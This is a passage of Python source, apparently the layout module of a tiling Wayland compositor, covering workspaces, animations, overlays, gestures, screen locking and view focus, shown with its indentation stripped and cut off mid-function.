def _score(i1: float, j1: float, w1: float, h1: float,
im: int, jm: int,
i2: float, j2: float, w2: float, h2: float) -> float:
if (i1, j1, w1, h1) == (i2, j2, w2, h2):
return 1000
if im < 0:
im *= -1
i1 *= -1
i2 *= -1
i1 -= w1
i2 -= w2
if jm < 0:
jm *= -1
j1 *= -1
j2 *= -1
j1 -= h1
j2 -= h2
if jm == 1 and im == 0:
im, jm = jm, im
i1, j1, w1, h1 = j1, i1, h1, w1
i2, j2, w2, h2 = j2, i2, h2, w2
"""
At this point: im == 1, jm == 0
"""
d_i = i2 - (i1 + w1)
if d_i < 0:
return 1000
d_j = 0.
if j2 >= j1 + h1:
d_j = j2 - (j1 + h1)
elif j1 >= j2 + h2:
d_j = j1 - (j2 + h2)
else:
d_j = -1
return d_i + d_j
class Animation:
def __init__(self,
layout: Layout,
reducer: Callable[[LayoutState], tuple[Optional[LayoutState], Optional[LayoutState]]],
duration: float, then: Optional[Callable[..., None]], overlay_safe: bool=False) -> None:
super().__init__()
self.layout = layout
"""
(current state) -> (animation initial state (possibly None), animation final state)
"""
self.reducer = reducer
self._initial_state: Optional[LayoutState] = None
self._final_state: Optional[LayoutState] = None
self._started: Optional[float] = None
# Prevent devision by zero
self.duration = max(.1, duration)
self.then = then
self.overlay_safe = overlay_safe
def check_finished(self) -> bool:
if self._started is not None and self._final_state is None:
return True
if self._started is not None and time.time() > self._started + self.duration:
if self._final_state is not None:
self.layout.update(self._final_state)
if callable(self.then):
self.then()
return True
return False
def start(self) -> None:
try:
self._initial_state, self._final_state = self.reducer(self.layout.state)
except:
logger.exception("During animation reducer")
self._initial_state, self._final_state = None, None
if self._initial_state is not None:
self.layout.update(self._initial_state)
self._started = time.time()
if self._final_state is not None:
# Enforce constraints on final state
self._final_state.constrain()
self._final_state.validate_fullscreen()
self._final_state.validate_stack_indices()
self.layout._animate_to(self._final_state, self.duration)
else:
logger.debug("Animation decided not to take place anymore")
def __str__(self) -> str:
return "%s -> %s (%f%s)" % (self._initial_state, self._final_state, self.duration, ", then" if self.then is not None else "")
class LayoutThread(Thread):
def __init__(self, layout: Layout) -> None:
super().__init__()
self.layout = layout
"""
Overlay or Animation
"""
self._pending: list[Any] = []
self._current_ovr: Optional[Overlay] = None
self._current_anim: Optional[Animation] = None
self._running = True
def stop(self) -> None:
self._running = False
def push(self, nxt: Union[Overlay, Animation]) -> None:
if isinstance(nxt, Overlay):
if self._current_ovr is not None or len([x for x in self._pending if isinstance(x, Overlay)]) > 0:
logger.debug("Rejecting queued overlay")
return
else:
logger.debug("Queuing overlay")
self._pending += [nxt]
else:
if nxt.overlay_safe:
logger.debug("Overlay-safe animation not queued")
self._pending = [nxt] + self._pending
else:
logger.debug("Queuing animation")
self._pending += [nxt]
def on_overlay_destroyed(self) -> None:
logger.debug("Thread: Finishing overlay...")
self._current_ovr = None
def run(self) -> None:
while self._running:
try:
if len(self._pending) > 0:
if isinstance(self._pending[0], Overlay):
if self._current_anim is None and self._current_ovr is None:
logger.debug("Thread: Starting overlay...")
self._current_ovr = self._pending.pop(0)
self.layout.start_overlay(self._current_ovr)
else:
if self._current_anim is None and (self._current_ovr is None or self._pending[0].overlay_safe):
logger.debug("Thread: Starting animation...")
self._current_anim = self._pending.pop(0)
self._current_anim.start()
if self._current_anim is not None:
if self._current_anim.check_finished():
logger.debug("Thread: Finishing animation...")
self._current_anim = None
except Exception:
logger.exception("Unexpected during LayoutThread")
time.sleep(1. / 120.)
class Workspace:
def __init__(self, output: PyWMOutput, pos_x: int, pos_y: int, width: int, height: int, prevent_anim: bool=False) -> None:
self._handle = -1
self.outputs = [output]
self.pos_x = pos_x
self.pos_y = pos_y
self.width = width
self.height = height
self.prevent_anim = prevent_anim
# Hint at view._handle to focus when switching to this workspace (not guaranteed to exist anymore)
self.focus_view_hint: Optional[int] = None
def swallow(self, other: Workspace) -> bool:
if self.pos_x + self.width <= other.pos_x:
return False
if self.pos_y + self.height <= other.pos_y:
return False
if self.pos_x >= other.pos_x + other.width:
return False
if self.pos_y >= other.pos_y + other.height:
return False
pos_x = min(self.pos_x, other.pos_x)
pos_y = min(self.pos_y, other.pos_y)
width = max(self.pos_x + self.width, other.pos_x + other.width) - pos_x
height = max(self.pos_y + self.height, other.pos_y + other.height) - pos_y
self.pos_x = pos_x
self.pos_y = pos_y
self.width = width
self.height = height
self.outputs += other.outputs
self.prevent_anim |= other.prevent_anim
return True
def score(self, other: Workspace) -> float:
x, y, w, h = self.pos_x, self.pos_y, self.width, self.height
if other.pos_x > x:
w -= (other.pos_x - x)
x += (other.pos_x - x)
if other.pos_y > y:
h -= (other.pos_y - y)
y += (other.pos_y - y)
if x + w > other.pos_x + other.width:
w -= (x + w - other.pos_x - other.width)
if y + h > other.pos_y + other.height:
h -= (y + h - other.pos_y - other.height)
if w <= 0 or h <= 0:
return 0
return w*h / (self.width * self.height)
def __str__(self) -> str:
return "Workspace[%d] at %d, %d --> %d, %d" % (
self._handle,
self.pos_x,
self.pos_y,
self.width,
self.height,
)
class Layout(PyWM[View], Animate[PyWMDownstreamState]):
def __init__(self, debug: bool=False) -> None:
load_config()
self._debug = debug
PyWM.__init__(self, View, **conf_pywm(), outputs=conf_outputs(), debug=debug)
Animate.__init__(self)
self.mod = conf_mod()
self.mod_sym = ""
self._set_mod_sym()
self.key_processor = KeyProcessor(self.mod_sym)
self.sys_backend = SysBackend(self)
self.auth_backend = AuthBackend(self)
self.panel_launcher = PanelsLauncher()
self.panel_endpoint = PanelEndpoint(self)
self.workspaces: list[Workspace] = [Workspace(PyWMOutput("dummy", -1, 1., 1280, 720, (0, 0)), 0, 0, 1280, 720)]
self.state = LayoutState()
self.overlay: Optional[Overlay] = None
self.backgrounds: list[Background] = []
self.top_bars: list[TopBar] = []
self.bottom_bars: list[BottomBar] = []
self.corners: list[list[Corner]] = []
self.thread = LayoutThread(self)
self._animations: list[Animation] = []
self._idle_inhibit_user = False
# Workspace cursor is on, Focused workspace override by focused view
self._active_workspace: tuple[Workspace, Optional[Workspace]] = self.workspaces[0], None
def _set_mod_sym(self) -> None:
self.mod_sym = ""
if self.mod == PYWM_MOD_ALT:
self.mod_sym = "Alt"
elif self.mod == PYWM_MOD_LOGO:
self.mod_sym = "Super"
else:
raise Exception("Unknown mod")
def _setup_workspaces(self) -> None:
output_conf = conf_outputs()
def disable_anim(output: PyWMOutput) -> bool:
for o in output_conf:
if o['name'] == output.name:
return 'anim' in o and not o['anim']
return False
ws = [Workspace(o, o.pos[0], o.pos[1], o.width, o.height, disable_anim(o)) for o in self.layout]
i, j = 0, len(ws) - 1
while i < len(ws) and j < len(ws) and i < j:
if ws[i].swallow(ws[j]):
del ws[j]
else:
if j == i + 1:
j = len(ws) - 1
i += 1
else:
j -= 1
for w in self.workspaces:
best_score = 0.1
best_ws = None
for wp in ws:
if wp._handle >= 0:
continue
score = w.score(wp)
if score > best_score:
best_score = score
best_ws = wp
if best_ws is not None:
best_ws._handle = w._handle
self.workspaces = ws
for w in [w for w in self.workspaces if w._handle < 0]:
h = 0
while True:
if h not in [w._handle for w in self.workspaces]:
break
h+=1
w._handle = h
logger.debug("Setup of newm workspaces")
for w in self.workspaces:
logger.debug(" %s" % str(w))
self.state = self.state.with_workspaces(self)
self._update_active_workspace()
def _update_active_workspace(self) -> None:
# Clean
ws_check1, ws_check2 = self._active_workspace
if ws_check1._handle not in [w._handle for w in self.workspaces]:
ws_check1 = self.workspaces[0]
if ws_check2 is not None and ws_check2._handle not in [w._handle for w in self.workspaces]:
ws_check2 = None
self._active_workspace = ws_check1, ws_check2
# Find ws cursor is on
ws: Optional[Workspace] = None
for w in self.workspaces:
if w.pos_x <= self.cursor_pos[0] < w.pos_x + w.width and w.pos_y <= self.cursor_pos[1] < w.pos_y + w.height:
ws = w
break
# Possibly update ws after cursor move
if ws is None:
logger.warn("Workspaces do not cover whole area")
else:
ws_old, _ = self._active_workspace
if ws_old != ws:
self._active_workspace = ws, None
def _setup_widgets(self) -> None:
def get_workspace_for_output(output: PyWMOutput) -> Workspace:
for w in self.workspaces:
if w.pos_x <= output.pos[0] < w.pos_x + w.width and w.pos_y <= output.pos[1] < w.pos_y + w.height:
return w
logger.warn("Workspaces do not cover whole area")
return self.workspaces[0]
for b in self.bottom_bars:
b.stop()
b.destroy()
self.bottom_bars = []
for t in self.top_bars:
t.stop()
t.destroy()
self.top_bars = []
for bg in self.backgrounds:
bg.destroy()
self.backgrounds = []
for c in self.corners:
for c2 in c:
c2.destroy()
self.corners = []
if conf_bar_enabled():
self.bottom_bars = [self.create_widget(BottomBar, o) for o in self.layout]
self.top_bars = [self.create_widget(TopBar, o) for o in self.layout]
else:
self.bottom_bars = []
self.top_bars = []
self.backgrounds = [self.create_widget(Background, o, get_workspace_for_output(o)) for o in self.layout]
for o in self.layout:
self.corners += [[
self.create_widget(Corner, o, True, True),
self.create_widget(Corner, o, True, False),
self.create_widget(Corner, o, False, True),
self.create_widget(Corner, o, False, False)
]]
self.damage()
def _setup(self, fallback: bool=True, reconfigure: bool=True) -> None:
if reconfigure:
load_config(fallback=fallback)
self.mod = conf_mod()
self._set_mod_sym()
self.configure_gestures(
conf_two_finger_min_dist(),
conf_lp_freq(),
conf_lp_inertia(),
conf_validate_threshold())
self._setup_widgets()
self.key_processor.clear()
if (kb := conf_key_bindings()) is not None:
self.key_processor.register_bindings(
*kb(self)
)
self.sys_backend.set_endpoints(
*conf_sys_backend_endpoints()
)
self.sys_backend.register_xf86_keybindings()
if reconfigure:
self.reconfigure(dict(**conf_pywm(), outputs=conf_outputs(), debug=self._debug))
def reducer(self, state: LayoutState) -> PyWMDownstreamState:
return PyWMDownstreamState(state.lock_perc)
def animate(self, old_state: LayoutState, new_state: LayoutState, dt: float) -> None:
cur = self.reducer(old_state)
nxt = self.reducer(new_state)
self._animate(LayoutDownstreamInterpolation(self, cur, nxt), dt)
def process(self) -> PyWMDownstreamState:
return self._process(self.reducer(self.state))
def main(self) -> None:
logger.debug("Layout main...")
self._setup(reconfigure=False)
self.thread.start()
self.panel_endpoint.start()
self.panel_launcher.start()
# Initially display cursor
self.update_cursor()
# Run on_startup
try:
conf_on_startup()()
except Exception:
logger.exception("on_startup")
# Fade in
def fade_in() -> None:
time.sleep(.5)
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
return None, state.copy(background_opacity=1.)
self.animate_to(reducer, conf_blend_t())
Thread(target=fade_in).start()
# Greeter
if self.auth_backend.is_greeter():
def greet() -> None:
while len([p for p in self.panels() if p.panel == "lock"]) < 1:
time.sleep(.5)
self.ensure_locked()
self.auth_backend.init_session()
Thread(target=greet).start()
def _terminate(self) -> None:
super().terminate()
self.panel_endpoint.stop()
self.panel_launcher.stop()
for t in self.top_bars:
t.stop()
for b in self.bottom_bars:
b.stop()
if self.sys_backend is not None:
self.sys_backend.stop()
if self.thread is not None:
self.thread.stop()
def animate_to(self,
reducer: Callable[[LayoutState], tuple[Optional[LayoutState], Optional[LayoutState]]],
duration: float,
then: Optional[Callable[..., None]]=None,
overlay_safe: bool=False) -> None:
self.thread.push(Animation(self, reducer, duration, then, overlay_safe))
def damage(self) -> None:
super().damage()
for _, v in self._views.items():
v.damage()
for bg in self.backgrounds:
bg.damage()
for t in self.top_bars:
t.damage()
for b in self.bottom_bars:
b.damage()
def update(self, new_state: LayoutState) -> None:
self.state = new_state
self.damage()
def _animate_to(self, new_state: LayoutState, duration: float) -> None:
self.animate(self.state, new_state, duration)
for _, v in self._views.items():
v.animate(self.state, new_state, duration)
for bg in self.backgrounds:
bg.animate(self.state, new_state, duration)
for t in self.top_bars:
t.animate(self.state, new_state, duration)
for b in self.bottom_bars:
b.animate(self.state, new_state, duration)
def _trusted_unlock(self) -> None:
if self.is_locked():
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
return None, state.copy(lock_perc=0., background_opacity=1.)
self.animate_to(
reducer,
conf_anim_t(),
lambda: self.update_cursor())
"""
Utilities
"""
def __str__(self) -> str:
return "<Layout %s>" % (self.config)
def debug_str(self) -> str:
res = "%s\n %s\n\n" % (self, str(self.state))
for w in self.workspaces:
res += "%s\n %s\n" % (str(w), self.state.get_workspace_state(w))
for i, v in self._views.items():
s = None
ws_handle = -1
try:
s, ws_state, ws_handle = self.state.find_view(v)
except:
pass
res += "%2d: %s on workspace %d\n %s\n" % (i, v, ws_handle, s)
return res
def find_focused_box(self) -> tuple[Workspace, float, float, float, float]:
try:
view = self.find_focused_view()
if view is not None:
view_state, ws_state, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
return ws, view_state.i, view_state.j, view_state.w, view_state.h
except Exception:
return self.workspaces[0], 0, 0, 1, 1
def place_initial(self, workspace: Workspace, ws_state: WorkspaceState, w: int, h: int) -> tuple[int, int]:
"""
Strategy
- If viewpoint > extent:
- If first view: Place at 0, 0
- Otherwise: Enlarge to the top right (if space) or bottom left
- Else
- Start at top right visible tile and move to right (alternatively traverse in spiral) to find closest unused tile
"""
place_i = 0
place_j = 0
min_i, min_j, max_i, max_j = ws_state.get_extent()
min_i = math.floor(min_i)
min_j = math.floor(min_j)
max_i = math.floor(max_i)
max_j = math.floor(max_j)
view_min_i, view_min_j = ws_state.i, ws_state.j
view_max_i, view_max_j = ws_state.i + ws_state.size - 1, ws_state.j + ws_state.size - 1
view_min_i = math.floor(view_min_i)
view_min_j = math.floor(view_min_j)
view_max_i = math.ceil(view_max_i)
view_max_j = math.ceil(view_max_j)
if len(self.tiles(workspace)) == 0:
place_i, place_j = 0, 0
elif (view_max_i - view_min_i) > (max_i - min_i):
place_i, place_j = max_i + 1, max(min_j, view_min_j)
elif (view_max_j - view_min_j) > (max_j - min_j):
place_i, place_j = max(min_i, view_min_i), max_j + 1
else:
i, j = ws_state.i, ws_state.j
for j, i in product(range(math.floor(j),
math.ceil(j + ws_state.size)),
range(math.floor(i),
math.ceil(i + ws_state.size))):
for jp, ip in product(range(j, j + h), range(i, i + w)):
if not ws_state.is_tile_free(ip, jp):
break
else:
place_i, place_j = i, j
break
else:
ws_, i_, j_, w_, h_ = self.find_focused_box()
if ws_._handle != workspace._handle:
i_, j_, w_, h_ = 0, 0, 1, 1
place_i, place_j = round(i_ + w_), round(j_)
while not ws_state.is_tile_free(place_i, place_j):
place_i += 1
logger.debug("Found initial placement at %d, %d", place_i, place_j)
return place_i, place_j
def on_layout_change(self) -> None:
self._setup_workspaces()
self._setup_widgets()
def on_key(self, time_msec: int, keycode: int, state: int, keysyms: str) -> bool:
# BEGIN DEBUG
if self.modifiers & self.mod > 0 and keysyms == "D":
self.force_close_overlay()
return True
# END DEBUG
if self.overlay is not None and self.overlay.ready():
logger.debug("...passing to overlay %s", self.overlay)
if self.overlay.on_key(time_msec, keycode, state, keysyms):
return True
return self.key_processor.on_key(state == PYWM_PRESSED,
keysyms,
self.modifiers,
self.mod,
self.is_locked())
def on_modifiers(self, modifiers: int) -> bool:
if self.is_locked():
return False
if self.modifiers & self.mod > 0:
"""
This is a special case, if a SingleFingerMoveGesture has started, then
Mod is pressed the MoveResize(Floating)Overlay is not triggered - we reallow a
gesture
If a gesture has been captured reallow_gesture is a noop
"""
logger.debug("Resetting gesture")
self.reallow_gesture()
if self.overlay is not None and self.overlay.ready():
if self.overlay.on_modifiers(modifiers):
return True
return False
def on_motion(self, time_msec: int, delta_x: float, delta_y: float) -> bool:
self._update_active_workspace()
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_motion(time_msec, delta_x, delta_y)
return False
def on_button(self, time_msec: int, button: int, state: int) -> bool:
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_button(time_msec, button, state)
return False
def on_axis(self, time_msec: int, source: int, orientation: int, delta: float, delta_discrete: int) -> bool:
if self.is_locked():
return False
if self.overlay is not None and self.overlay.ready():
return self.overlay.on_axis(time_msec, source, orientation,
delta, delta_discrete)
return False
def on_gesture(self, gesture: Gesture) -> bool:
if self.is_locked():
return False
logger.debug("Gesture %s...", gesture)
if self.overlay is not None and self.overlay.ready():
logger.debug("...passing to overlay %s", self.overlay)
return self.overlay.on_gesture(gesture)
elif self.overlay is None:
if self.modifiers & self.mod and \
(isinstance(gesture, TwoFingerSwipePinchGesture) or
isinstance(gesture, SingleFingerMoveGesture)):
logger.debug("...MoveResize")
view = self.find_focused_view()
ovr: Optional[Overlay] = None
if view is not None and view.is_float(self.state):
ovr = MoveResizeFloatingOverlay(self, view)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
elif view is not None and view.is_tiled(self.state):
ovr = MoveResizeOverlay(self, view)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 3:
logger.debug("...Swipe")
ovr = SwipeOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if not self.state.get_workspace_state(self.get_active_workspace()).is_in_overview():
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 4:
logger.debug("...SwipeToZoom")
ovr = SwipeToZoomOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
if isinstance(gesture, HigherSwipeGesture) \
and gesture.n_touches == 5:
logger.debug("...Launcher")
ovr = LauncherOverlay(self)
ovr.on_gesture(gesture)
self.enter_overlay(ovr)
return True
return False
def on_idle(self, elapsed: float, idle_inhibited: bool) -> None:
idle_inhibited = idle_inhibited or self._idle_inhibit_user
if idle_inhibited and elapsed > 0:
return
if elapsed == 0:
self.sys_backend.idle_state(0)
elif len(conf_power_times()) > 2 and elapsed > conf_power_times()[2]:
os.system(conf_suspend_command())
elif len(conf_power_times()) > 1 and elapsed > conf_power_times()[1]:
self.sys_backend.idle_state(2)
self.ensure_locked()
elif len(conf_power_times()) > 0 and elapsed > conf_power_times()[0]:
self.sys_backend.idle_state(1)
def on_wakeup(self) -> None:
if conf_lock_on_wakeup():
self.ensure_locked()
def enter_overlay(self, overlay: Overlay) -> None:
self.thread.push(overlay)
def start_overlay(self, overlay: Overlay) -> None:
logger.debug("Going to enter %s...", overlay)
self.key_processor.on_other_action()
self.overlay = overlay
self.overlay.init()
# BEGIN DEBUG
def force_close_overlay(self) -> None:
if self.overlay is None:
return
logger.debug("Force-closing %s", self.overlay)
try:
self.overlay.destroy()
finally:
self.overlay = None
# END DEBUG
def exit_overlay(self) -> None:
logger.debug("Going to exit overlay...")
if self.overlay is None:
logger.debug("...aborted")
return
logger.debug("...destroy")
self.overlay.destroy()
def on_overlay_destroyed(self) -> None:
logger.debug("Overlay destroyed")
self.thread.on_overlay_destroyed()
self.overlay = None
logger.debug("Resetting gesture")
self.reallow_gesture()
def destroy_view(self, view: View) -> None:
logger.info("Destroying view %s", view)
state = None
ws_state = None
try:
state, ws_state, ws_handle = self.state.find_view(view)
except:
"""
This can happen if the view has not been mapped (view.show) when it is destroyed
"""
return
best_view: Optional[int] = None
if view.is_focused():
logger.debug("Finding view to focus since %s closes...", view)
if view.parent is not None:
p = cast(View, view.parent)
while not p.is_tiled(self.state) and p.parent is not None:
p = cast(View, p.parent)
if p is not None:
best_view = p._handle
if best_view is None:
best_view_score = 1000.
for k, s in ws_state._view_states.items():
if not s.is_tiled:
continue
if k == view._handle:
continue
i, j, w, h = state.i, state.j, state.w, state.h
if state.is_layer:
i, j = ws_state.i + .5*ws_state.size, ws_state.j + .5*ws_state.size
w, h = 0, 0
elif not state.is_tiled:
i, j = state.float_pos
w, h = 0, 0
sc = (s.i - i + s.w / 2. - w / 2.)**2 + (s.j - j + s.h / 2. - h / 2.)**2
logger.debug("View (%d) has score %f", k, sc)
if sc < best_view_score:
best_view_score = sc
best_view = k
if best_view is not None and best_view in self._views:
logger.debug("Found view to focus: %s" % self._views[best_view])
bv: int = best_view
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
try:
self._views[bv].focus()
state = state\
.focusing_view(self._views[bv])\
.without_view_state(view)\
.constrain()
except:
"""
View might not exist anymore
"""
state = state\
.copy()\
.without_view_state(view)\
.constrain()
return None, state
self.animate_to(
reducer,
conf_anim_t())
else:
logger.debug("Not focusing a view")
self.animate_to(
lambda state: (None, state
.copy()
.without_view_state(view)
.constrain()),
conf_anim_t())
def focus_hint(self, view: View) -> None:
try:
_, __, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
ws.focus_view_hint = view._handle
ws_a, ws_a_old = self._active_workspace
self._active_workspace = ws_a, ws
except Exception:
logger.warn("Missing state: %s" % self)
def command(self, cmd: str, arg: Optional[str]=None) -> Optional[str]:
logger.debug(f"Received command {cmd}")
def set_inhibit_idle(status: bool) -> None:
self._idle_inhibit_user = status
def lock() -> None:
self._update_idle(True)
self.ensure_locked(anim=False)
def clean() -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
new_state = state.copy().clean(list(self._views.keys()))
return None, new_state
self.animate_to(reducer, conf_anim_t())
cmds: dict[str, Callable[[], Optional[str]]] = {
"lock": self.ensure_locked,
"lock-pre": lambda: self.ensure_locked(anim=False),
"lock-post": lock,
"config": print_config,
"debug": self.debug_str,
"inhibit-idle": lambda: set_inhibit_idle(True),
"finish-inhibit-idle": lambda: set_inhibit_idle(False),
"close-launcher": lambda: self.exit_overlay() if isinstance(self.overlay, LauncherOverlay) else None,
"open-virtual-output": lambda: self.open_virtual_output(arg) if arg is not None else None,
"close-virtual-output": lambda: self.close_virtual_output(arg) if arg is not None else None,
"clean": clean
}
return cmds.get(cmd, lambda: f"Unknown command {cmd}")()
def launch_app(self, cmd: str) -> None:
"""
Should be LauncherOverlay
"""
self.exit_overlay()
os.system("%s &" % cmd)
def is_view_on_workspace(self, view: View, workspace: Optional[Workspace]) -> bool:
if workspace is None:
return True
try:
_, __, ws_handle = self.state.find_view(view)
return workspace._handle == ws_handle
except Exception:
logger.warn("Missing state: %s" % self)
return False
"""
API to be used for configuration
1. Getters
"""
def get_active_workspace(self) -> Workspace:
if self._active_workspace[1] is not None:
return self._active_workspace[1]
return self._active_workspace[0]
def tiles(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_tiled(self.state) and self.is_view_on_workspace(v, workspace)]
def floats(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_float(self.state) and self.is_view_on_workspace(v, workspace)]
def panels(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if v.is_panel() and self.is_view_on_workspace(v, workspace)]
def views(self, workspace: Optional[Workspace]=None) -> list[View]:
return [v for _, v in self._views.items() if not v.is_panel() and self.is_view_on_workspace(v, workspace)]
def find_focused_view(self) -> Optional[View]:
for _, view in self._views.items():
if view.is_focused():
return view
return None
"""
2. General purpose methods
"""
def update_config(self) -> None:
self._setup(fallback=False)
self.damage()
conf_on_reconfigure()()
def ensure_locked(self, anim: bool=True, dim: bool=False) -> None:
def focus_lock() -> None:
lock_screen = [v for v in self.panels() if v.panel == "lock"]
if len(lock_screen) > 0:
lock_screen[0].focus()
else:
logger.exception("Locking without lock panel - not a good idea")
self.auth_backend.lock()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
return None if anim else state.copy(lock_perc=1., background_opacity=.5), state.copy(lock_perc=1., background_opacity=.5)
self.animate_to(
reducer,
conf_anim_t(), focus_lock)
if dim:
self.sys_backend.idle_state(1)
def terminate(self) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
return state.copy(final=True), state.copy(final=True, background_opacity=0.)
self.animate_to(reducer, conf_blend_t(), self._terminate)
"""
3. Change global or workspace state / move viewpoint
"""
def enter_launcher_overlay(self) -> None:
self.enter_overlay(LauncherOverlay(self))
def toggle_overview(self, only_active_workspace: bool=False) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
if only_active_workspace:
overview = not state.get_workspace_state(self.get_active_workspace()).is_in_overview()
else:
overview = not state.all_in_overview()
focused: Optional[View] = None
if not overview:
focused = self.find_focused_view()
return None, state.with_overview_set(overview, None if not only_active_workspace else self.get_active_workspace(), focused)
self.animate_to(reducer, conf_anim_t())
def toggle_fullscreen(self, defined_state: Optional[bool] = None) -> None:
active_ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
if state.get_workspace_state(self.get_active_workspace()).is_in_overview():
state = state.with_overview_set(False, only_workspace=self.get_active_workspace())
view = self.find_focused_view()
if view is not None and not view.is_tiled(state):
view = None
if view is not None:
while view.parent is not None and not view.is_tiled(state):
view = cast(View, view.parent)
ws: Optional[Workspace] = None
ws_state: Optional[WorkspaceState] = None
if view is not None:
view_state, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
else:
ws = active_ws
ws_state = state.get_workspace_state(active_ws)
fs = ws_state.is_fullscreen()
if fs == defined_state:
return None, None
if conf_send_fullscreen_to_views():
for v in self.tiles():
v.set_fullscreen(not fs)
if fs:
return None, state.setting_workspace_state(ws, ws_state.without_fullscreen())
elif view is not None:
return None, state.setting_workspace_state(ws, ws_state.with_fullscreen(view))
else:
return None, None
self.animate_to(reducer, conf_anim_t())
def basic_move(self, delta_i: int, delta_j: int) -> None:
ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
ws_state = state.get_workspace_state(ws)
return None, state.replacing_workspace_state(ws, i=ws_state.i+delta_i, j=ws_state.j+delta_j)
self.animate_to(reducer, conf_anim_t())
def basic_scale(self, delta_s: int) -> None:
ws = self.get_active_workspace()
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
ws_state = state.get_workspace_state(ws)
return None, state.replacing_workspace_state(ws, size=max(1, ws_state.size+delta_s))
self.animate_to(reducer, conf_anim_t())
"""
4. Change focus
"""
def focus_view(self, view: View) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], LayoutState]:
view.focus()
return None, state.focusing_view(view)
self.animate_to(reducer, conf_anim_t())
def move_in_stack(self, delta: int) -> None:
view = self.find_focused_view()
if view is None:
return
try:
view_state, ws_state, ws_handle = self.state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
sid, idx, siz = view_state.stack_data
nidx = (idx+1)%siz
next_view = [k for k, s in ws_state._view_states.items() if s.stack_data[0] == sid and s.stack_data[1]==nidx]
if len(next_view) > 0 and next_view[0] != view:
self._views[next_view[0]].focus()
except:
logger.exception("Unexpected")
def move(self, delta_i: int, delta_j: int) -> None:
ws, i, j, w, h = self.find_focused_box()
ws_state = self.state.get_workspace_state(ws)
if ((i + w > ws_state.i + ws_state.size and delta_i > 0) or
(i < ws_state.i and delta_i < 0) or
(j + h > ws_state.j + ws_state.size and delta_j > 0) or
(j < ws_state.j and delta_j < 0)):
vf = self.find_focused_view()
if vf is not None:
self.focus_view(vf)
return
best_view = None
best_view_score = 1000.
for k, s in ws_state._view_states.items():
if not s.is_tiled:
continue
sc = _score(i, j, w, h, delta_i, delta_j, s.i, s.j, s.w, s.h)
if sc < best_view_score:
best_view_score = sc
best_view = k
if best_view is not None:
self.focus_view(self._views[best_view])
def move_next_view(self, dv: int=1, active_workspace: bool=True) -> None:
views = self.views(self.get_active_workspace() if active_workspace else None)
focused_view = self.find_focused_view()
if focused_view is not None and focused_view in views:
idx = views.index(focused_view)
next_view = views[(idx + dv)%len(views)]
self.focus_view(next_view)
elif len(views) > 0:
self.focus_view(views[0])
def move_workspace(self, ds: int=1) -> None:
ws = self.get_active_workspace()
i, ws = [(i, w) for i, w in enumerate(self.workspaces) if w._handle == ws._handle][0]
i = (i + ds) % len(self.workspaces)
ws_new = self.workspaces[i]
views = self.views(ws_new)
if ws_new.focus_view_hint is not None:
view = [v for v in views if v._handle == ws_new.focus_view_hint]
if len(view) == 1:
self.focus_view(view[0])
return
if len(views) > 0:
self.focus_view(views[0])
"""
5. Change focused view
"""
def close_focused_view(self) -> None:
view = [v for _, v in self._views.items() if v.is_focused()]
if len(view) == 0:
return
view[0].close()
def toggle_focused_view_floating(self) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
s1, s2 = view.toggle_floating(s, ws, ws_state)
ws_state1 = ws_state.with_view_state(view, **s1.__dict__)
ws_state2 = ws_state.replacing_view_state(view, **s2.__dict__)
ws_state2.validate_stack_indices(view)
return (state.setting_workspace_state(ws, ws_state1), state.setting_workspace_state(ws, ws_state2))
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def change_focused_view_workspace(self, ds: int=1) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
i, ws = [(i, w) for i, w in enumerate(self.workspaces) if w._handle == ws_handle][0]
if not s.is_tiled:
return None, None
i = (i + ds) % len(self.workspaces)
ws_new = self.workspaces[i]
ws_state = state.get_workspace_state(ws_new)
if ws == ws_new:
return None, None
state = state.without_view_state(view)
state0, state1 = view._show_tiled(ws_new, state, ws_state)
return (state0, state1)
except:
return (None, state)
else:
return (None, state)
self.animate_to(reducer, conf_anim_t())
def move_focused_view(self, di: int, dj: int) -> None:
def reducer(state: LayoutState) -> tuple[Optional[LayoutState], Optional[LayoutState]]:
view = self.find_focused_view()
if view is not None:
try:
s, ws_state, ws_handle = state.find_view(view)
ws = [w for w in self.workspaces if w._handle == ws_handle][0]
